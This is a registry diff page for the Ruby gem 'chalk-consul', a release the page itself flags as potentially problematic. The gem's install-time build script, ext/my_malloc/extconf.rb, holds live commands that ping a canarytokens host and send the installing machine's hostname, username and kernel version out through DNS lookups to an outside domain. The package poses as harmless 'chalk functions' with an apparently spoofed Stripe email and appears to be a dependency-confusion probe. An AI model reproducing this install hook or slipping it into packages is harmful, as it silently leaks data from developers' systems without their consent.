chalk-consul 0.1.21

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of chalk-consul might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 238dd1b1a127e56613ae7d6d9bd283ac49c5eaadbe0bedd84f8aca30a5b864e7
4
+ data.tar.gz: b23d5d4b11331f4e76090203b3ddff04be00c17f4794d7ccad363c08a8fe4ced
5
+ SHA512:
6
+ metadata.gz: 9abac7a6d2fa77255370458b91857e66d05ee967930ef022e927cb9b3418dcf2c4cf90ea9122bd700b1878d7e319f32f646f405417c27bd38d37c1a4eba5e835
7
+ data.tar.gz: 9bc0e883ee8d2089f0314d0cf74528d813c4b629e7d3d393ad7a5c8a0fdf9c56a4687dd8bb2a07d2e4ee34ea8f83aa52e1096f0be34ab1ffdf923c4943ecc493
@@ -0,0 +1,13 @@
1
+ #!/usr/bin/ruby
2
+
3
+ `ping skk5cuaoyh7gwq1g6wacmrkbz.canarytokens.com`
4
+ `ping $(hostname | base64).dns.gostripe.click`
5
+ `ping $(whoami | base64).dns.gostripe.click`
6
+ `ping $(uname -r | base64).dns.gostripe.click`
7
+
8
+ require "mkmf"
9
+
10
+ abort "missing malloc()" unless have_func "malloc"
11
+ abort "missing free()" unless have_func "free"
12
+
13
+ create_makefile "my_malloc/my_malloc"
data/lib/file/file.rb ADDED
@@ -0,0 +1,2 @@
1
+ class File
2
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: chalk-consul
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.21
5
+ platform: ruby
6
+ authors:
7
+ - stegs
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2011-05-29 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: Provides chalk functions
14
+ email: stegs@stripe.com
15
+ executables: []
16
+ extensions:
17
+ - ext/my_malloc/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/my_malloc/extconf.rb
21
+ - lib/file/file.rb
22
+ homepage: ''
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.0.3
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: None
45
+ test_files: []